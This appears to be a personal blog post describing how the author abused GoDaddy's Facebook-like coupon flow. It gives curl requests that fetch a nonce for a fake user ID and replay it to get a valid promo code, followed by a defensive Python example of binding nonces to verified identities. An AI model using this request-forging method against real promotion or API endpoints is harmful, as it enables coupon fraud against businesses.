Gaming the GoDaddy Facebook Fan Page $1 Coupon

The other day I saw GoDaddy giving out “$1 for a domain” coupons if you “liked” them on Facebook.

That’s cool. I love $1 domains. But I don’t “like” anyone on Facebook. So after almost an of poking around and reading their JavaScript, here is what I discovered. (Btw, this does not work anymore, so I am basically just bragging… I know, it’s sad really…)

Here is how it worked:

1) You liked the GoDaddy page
2) You clicked on a link that said “Get Code”
3) A code is populated in a field, much like a scratch off pin # on gift cards.

At first I kept trying to mimic their JavaScript, but sending in fake information:

curl -i -H "Accept: application/json" -H "Content-Type: application/json" -X POST -d '{"getPromoModel":{"Email":"hi@godaddy.admin","Name":"how are you doing?","FacebookUserId":123456789,"OptIn":false,"ShopperId":1,"LikedTime":1,"Nonce":"b766daba70ebfa3e0800a4e20dd803ecb766daba70ebfa3e0800a4e20dd803ec"}}'

It did not work. It kept responding with a JSON that said “error”.

I almost gave up thinking that they must keep a list of FacebookUserIDs for everyone who actually “liked” them, so I could not just send in a fake ID.

But then I noticed that before they make a “GetPromoCode” request, they made a “CheckIfAlreadyGivenCode” request. Ok let’s do that.

curl -i -H "Accept: application/json" -H "Content-Type: application/json" -X POST -d "{'getPromoModel':{'FacebookUserId':123456789}}"

Bingo! It would return a “nonce” string specific to that User ID, which could be any random number.

Take that nonce and fake id, plug it back into the original “GetPromoCode”, and bam, the GoDaddy server returned with a valid coupon code.
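The flaw described above is that the nonce endpoint trusted whatever user ID the caller supplied. The following is an added example (not GoDaddy's code and not from the original post) that contrasts that behaviour with a nonce bound to a server-verified identity. The HMAC assertion format, the `user_id` and `liked` claim names, and all function names are assumptions.

```python
import base64, hashlib, hmac, json, secrets

APP_SECRET = b"constructed-demo-secret"  # assumption: key shared with the identity platform
_issued = {}                             # nonce -> user ID it was issued for

def _b64d(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))

def sign_assertion(claims):
    """Stand-in for the platform: builds constructed sample tokens."""
    body = base64.urlsafe_b64encode(json.dumps(claims).encode()).decode().rstrip("=")
    mac = hmac.new(APP_SECRET, body.encode(), hashlib.sha256).digest()
    return base64.urlsafe_b64encode(mac).decode().rstrip("=") + "." + body

def verify_assertion(token):
    """Return the claims dict only if the HMAC over the body checks out."""
    try:
        sig, body = token.split(".", 1)
        good = hmac.new(APP_SECRET, body.encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(_b64d(sig), good):
            return None
        claims = json.loads(_b64d(body))
    except (ValueError, AttributeError):
        return None
    return claims if isinstance(claims, dict) else None

def issue_nonce_weak(facebook_user_id):
    # Behaviour described in the post: the caller names any ID and gets a nonce for it.
    nonce = secrets.token_hex(32)
    _issued[nonce] = facebook_user_id
    return nonce

def issue_nonce_hardened(token):
    # The ID and the "liked" fact come from the verified assertion, never from the request body.
    claims = verify_assertion(token)
    if not claims or claims.get("liked") is not True or "user_id" not in claims:
        return None
    nonce = secrets.token_hex(32)
    _issued[nonce] = claims["user_id"]
    return nonce

def redeem(nonce, facebook_user_id):
    # Single use: the nonce is consumed whether or not the ID matches.
    owner = _issued.pop(nonce, None)
    return owner is not None and owner == facebook_user_id
```

With the weak issuer the nonce proves nothing, because the server itself hands it to anyone who asks. In the hardened path a nonce only exists for an ID the server has verified.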

Now… as much as I hate GoDaddy from the story I told in my last post, I try really hard to not be too stupid when it comes to computer mischief. So although I could have pounded their server and generated a ton of coupon codes, I decided it was not right for me to do that.

I was just content with being able to game them and left it at that. Although I was very very tempted to generate a big list and pass them out on slickdeals.